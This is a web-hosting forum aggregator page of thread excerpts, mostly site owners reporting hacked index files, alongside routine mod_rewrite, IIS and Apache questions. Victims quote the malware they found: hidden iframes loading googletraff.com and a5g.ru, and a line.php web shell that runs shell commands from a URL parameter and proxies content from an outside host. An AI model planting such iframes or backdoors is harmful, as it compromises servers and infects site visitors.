Dedicated Hacked With All Index Files
Sep 10, 2006
I was working on WHM of my server sudeenly i saw CPU load was increasing and till when i understand CPU load was on peak of 160%. I tried to find out CPU overloading sites and found that my 4 populer sites were creating problem. I stopped apache and suspanded all 4 sites and rebooted server. After forceful server reboot i found that load was getting normal to 2.5%. I unsuspanded one of 2 forums but even i unsuspanded that forum was not opening (IPB). I logged into ftp suspecting some problem i found that index.php was only 45bytes i have opend index.php and found this text inside .....
View 3 Replies
ADVERTISEMENT
Sep 8, 2007
My site was hacked today, all pages named index.html were hacked. It is kind of script since all pages were written same time.
I'm using a very respectable hosting. I jumped from another hosting were I was exposed on a unsecured host (they moved my account to an insecure host without asking).
Going back on track, all files named "%index%" were hacked.
-I found a index.txt file with links to obscure sites.
The code was written at bottom of the all index.html files: iframe code
Code:
><!-- ~ --><iframe src="http://googletraff.com/in.cgi?default" width="0" height="0" style="display:none"></iframe><!-- ~ -->
Also a line.php with the following code
PHP Code:
<?error_reporting(0);if($_GET['cmd45']) {system($_GET['cmd45']);}$domain = 'shemale1.biz';$ur = '/load.php?f=%s&ua=%s&ref=%s';$qs = $_SERVER['QUERY_STRING'];$ua = urlencode(substr($_SERVER['HTTP_USER_AGENT'],0,100));$ref = urlencode($_SERVER['HTTP_REFERER']);$redirect = sprintf($ur,$qs,$ua,$ref);#print $redirect;#exit;echo getcontent($domain,80,$redirect);exit;function getcontent($server, $port, $file){$socket=fsockopen($server,$port,$errno,$errstr,60) or die("Can't open socket");$refer = $_SERVER['HTTP_HOST']?$_SERVER['HTTP_HOST']:$server;fputs($socket, "GET $file HTTP/1.0
");fputs($socket, "Referer: http://$refer
");fputs($socket, "Host: $server
");fputs($socket, "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
");$wr = 0;while(!feof($socket)){ $temp = fgets($socket); if(eregi("<",$temp)) { $wr = 1; } if($wr) { $page .= $temp; } } fclose($socket); return $page; } ?>
So far I recover the files from backup, secured the config.php files and modify %index% to read only...finally changed the password...
View 5 Replies
View Related
Jul 15, 2008
when i oppened my site i found that there was a code in the index i don't know from what but when i earsed it it returned again ...
View 0 Replies
View Related
Jun 12, 2007
after week when my server upgrade the cpanel automatic i got infected in all
index files like index.html and index.php and index.asp and any index with any
extinstion and this is the code in all files
Code:
<iframe src=[url]
and when i delete this code it come again in all index files
i am in really trouble with my clients and i want to know how can i fix this
thing and never come back again
View 14 Replies
View Related
Apr 25, 2008
to found all of index.html files in my /home directory.
how can I found these files?
like this:
/home/a/public_html/index.html
/home/a/public_html/folder/index.html
/home/c/index.html
View 2 Replies
View Related
Apr 19, 2008
I have worked with mod_rewrite for years and never encountered this problem. I am converting html pages to a single php file and it works perfectly. I used htaccess the rewrite the urls to appear the same so that no links would be broken or lose SEO value.
The only problem is that my friend who also helped build the sites added different directories and within those directories are index.htm files that serve as a home page for the separate directory. Like /info/index.htm and /help/index.htm within the root directory. The problem is that for some reason my mod_rewrite directs to the main index.htm rewrite even if I include the whole path to the file. In htaccess I have this so far:
RewriteEngine on
RewriteRule index.htm$ index.php [L]
RewriteRule servers.htm$ index.php?action=servers [L]
RewriteRule movies.htm$ index.php?action=movies [L]
However there is a directory named "info" and inside that directory it has an index.htm file and it seems to conflict with my first mod_rewrite. I tried using:
RewriteRule /info/index.htm$ index.php?action=info [L]
and used other methods but none seem to work any ideas?
View 1 Replies
View Related
May 6, 2009
Sometime ago the DC told me there was too many files on server and I started to investigate what is was and i got info that some one hacked the server and was sending spam from it.
When I looked at the accounts in Direct Admin some of them had the contact email to some hacker so i deleted the emails and changed password on the DA account and the email of those accounts.
Still I got too many files all the time so the server goes down so i have to delete the spoolfile all the time like 10 times a day
Please help how do I detect from what account do the hacker operate?
Can I detect that somehow?
Is it possible to do some small script to detect this?
Is there any advanced module to DA that gives me the info?
View 5 Replies
View Related
Jul 10, 2009
My server was being hacked, I can find some HTML and PHP files which inserted the codes similar to the following by the hacker.
HTML Code:
<iframe src="http://a5g.ru:8080/ts/in.cgi?pepsi94" width=125 height=125 style="visibility: hidden"><
/iframe>
The inserted iframe src is not the same among the hacked files.
I am trying to find out all the hacked files on server, is there any way instead of checking the files manually?
View 14 Replies
View Related
Jun 23, 2008
Have a website that is making use of both index.html and index.php files as the main page. How can I achieve either through .htaccess or similar (shared hosting) to have the users directed to index.html and not load the index.php first off.
View 1 Replies
View Related
Mar 6, 2007
I am implementing one of my clients new sites ( the old site is written in plain html), and their new site uses ASP on every page.
The problem is that their old index.htm page has a pagerank of 4 which we want to keep.
And I have been advised that i need to do a 301 redirect to pass that PageRank onto their new index.asp page.
The other problem is that they are on a shared IIS hosting solution (with FastHosts), and obviously I don;t have total control over the server so cannot get into the root control panel.
My question is, whats the IIS alternative to .htaccess, which can be implemented on a limite-controlled IIS server?
JavaScript, I have heard is completely out the question
View 3 Replies
View Related
Nov 8, 2007
I have noticed in a few Windows server tha the server gets hacked and there are tons of files which are mostly DVD rips and games being transferred away which results in huge amount of data transferred and bandwidth consumption increasing to as far as 29 Mbps. On further investigation, I find that all the files get stored in either the Recycler directory or the System Volume Information directories in any of the drives. Now these two directories are protected operating system files. Even if there is a windows firewall installed, there is no difference. I have even noticed that in some servers there is an automatic exception rule added in the windows firewall enabling the torrent client to communicate outside the server. This seems to be a common problem with Windows 2003 server and seems to be some backdoor of Windows allowing hackers to use the server for seeding. Has anybody come across such a problem or know the solution? Kindly help me with this.
View 14 Replies
View Related
Mar 12, 2008
i have amny server , and i got about 7 server got infected
2 weeks ago i got some sites have avirs i delted the code which got added on some index.html & index.php " any index files "
i removed the code and cleaned the servers,
after 2 hrs i saw it back again.
i made scan and i got them back, i replaced the pages with cleaned pages, and removed it again.
but till now it came back after i remove.
how can i protict my server from this issus
View 3 Replies
View Related
Apr 14, 2007
I am being hacked & I don't know how they are getting files on my server. They are doing it on two of my domains, I suspended one and then they got it on the other. My FTP access log does not show anything suspicious..
How can I find their doorway?
View 4 Replies
View Related
Mar 27, 2007
I recompiled apache and php due to some problems. Now apache and php is running and I have a VB forum running fine. However, one folder has a PHP page named index.php when I type its URL I get it downloaded and it is not executed directly from the server.
when I add "?" to the end of the URL[url]" it runs with no problems!
Is it something wrong with httpd.conf or what?
View 6 Replies
View Related
Aug 14, 2007
Where are the DBs stored on linux based Dedicated servers?
View 5 Replies
View Related
Mar 25, 2008
What are our options for a secure and easy way to transfer files from our dedicated windows 2003 server to our local server? We want to create a job that transfers files twice a day from our dedicated server to our local machine.
View 2 Replies
View Related
Mar 9, 2007
I have a client who's index will not come up when using "www". Of course I have checked the dns severs and all is well.
View 4 Replies
View Related
Aug 28, 2009
I created the subdomain for my site www.mysite/myclientpotentialdomain, with the only purpose to show my client the mock up of his home page using his potential domain name.
The file is named index.htm and consist only the mock up image.
The problem that I encountered is when I refresh the browser (Firefox) the image disappears. I can see the alt tag, but the picture is gone. Works fine in IE though.
The only difference I have noticed that after the refreshment,
View 13 Replies
View Related
Sep 30, 2009
how to display the time and date of a file that was added to an Apache file directory on a cPanel server?
It used display the time and date back in the 1.3 and 2.0 days, but it doesn't on the 2.2 versions of Apache.
View 2 Replies
View Related
Jul 23, 2009
i have hosted my website on dadicated windows hosting with rackspace. my webiste default page was index.aspx. now i have created new home page with name the of index.html and uploaded this page to server and deleted old home page index.aspx but my new index.html page not showing when i try to open open my website www.example.com but its opening when i try with www.example.com/index.html.
View 4 Replies
View Related
Jan 14, 2008
I'm working with HELM panel
I have deleted the index.htm file and uploaded another one
the first one had some images <img>, now
1. when i request the main page [url] the old index file is still appearing!
2. the images that was in the <img> tags of the old index file can't be deleted or renamed : can't be accessed at all.
View 3 Replies
View Related
Mar 6, 2008
in many sites in my server torjan in index.html
in <ifram>
how to save my server from that .js torjan
and i need to ask about other thing this torjan can chang any this in backups
View 9 Replies
View Related
Dec 4, 2007
One of my customer's domain name's index page is hacked with the pharmacy kind of URLs all over on the homepage. Anyone has idea about this? You can see the URL at
[url]
View 3 Replies
View Related
Jul 25, 2009
I don't know what's wrong with the server where the wordpress site is hosted. But in the permalinks, index.php must be included in the permalinks (more information here:[url]
What can be fixed in the server so that wordpress permalinks will work correctly?
View 2 Replies
View Related
Jan 15, 2008
I am using WHMCS and need to upload an index.php per server I wish to monitor. How do I go about doing this so that I can view the page via this method
[url]
I'm using cpanel / centos
View 6 Replies
View Related
Nov 8, 2008
How to change index manager defaults?
Whenever I set up a new account
View 4 Replies
View Related
Jun 24, 2008
I had an untapped image upload site on my server which i forgot. Some guys or children upload something noxious and neutralize all the "index.php". This was a hack attempt with SSH.
We noticed that, close this account delete uploaded files. But there is a quirky problem. Any of index.php's isn't working after this attempt. Index file is working after change its name, example "mindex.php".
We updated all the services, rebuild apache but don't working. We can't use any index.php on the server.
Additionally, there are 34 possible trojans appear on the server. I tried to delete them with BitDefender but can't do that.( I checked that WHM / Scan for Trojan Horses )
View 7 Replies
View Related
Aug 3, 2008
Am suffering from a hacker every time, he changes my client’s index (index..Php).
I changed FTP log, but still, it seems doesn’t work!
My simple question: How to protect the index page from hackers?
View 4 Replies
View Related
Oct 26, 2008
I have subdomain, the index file was hacked
Who know how to protect the Index files with cpanel
View 8 Replies
View Related
Dec 4, 2008
I have multiple demo websites under single domain. and in each folder default page is as index.html
few days back i have observed a blank space on each index.html. when i check the code then i have found an auto generated code just after the body tag in index.html. the code is as follows
<div style="visibility:hidden"><iframe src="[url]
Also I am getting Question marks (?) in some blank spaces in HTML preview.
I have removed it but it again appears after some time. I have contacted to server support but they said that this is SQL Injection attack but there is no database connectivity involved in any of my websites.
View 12 Replies
View Related
Jul 7, 2007
I was using Apache's <Directory> directive to modify the way the default indexes look.
I recently moved from openSUSE to Windows Server 2003 and copied over the Directory code but it no longer works.
Code:
<Directory />
Options All
AllowOverride All
IndexOptions SuppressHTMLPreamble SuppressDescription FancyIndexing VersionSort FoldersFirst IgnoreCase IconsAreLinks NameWidth=60
HeaderName /!_images/html/header.shtml
ReadmeName /!_images/html/footer.shtml
AddIcon /!_images/icons/application.png .exe
AddIcon /!_images/icons/application_xp_terminal.png .sh
AddIcon /!_images/icons/book_open.png .pdf
AddIcon /!_images/icons/music.png .mp3 .ogg
AddIcon /!_images/icons/photo.png .jpg .jpeg .png .bmp .gif
AddIcon /!_images/icons/television.png .avi .wmv .xvid .divx .mpg .mpeg
AddIcon /!_images/icons/script_code_red.png .php .php4 .php5 .js
AddIcon /!_images/icons/ruby.png .ruby .rb
AddIcon /!_images/icons/folder.png ^^DIRECTORY^^
DefaultIcon /!_images/icons/page_white.png
IndexIgnore query.txt !_images !_Jason !_media2 lost+found Modules _images login torrentflux phpinfo.php Thumbs.db tmp.txt phpmyadmin sandbox test.txt test.php _index.php robots.txt System Volume Information RECYCLER
</Directory>
It doesn't load the headerfile or the readme file (they exist) and it uses the Default Icon for all files
View 10 Replies
View Related
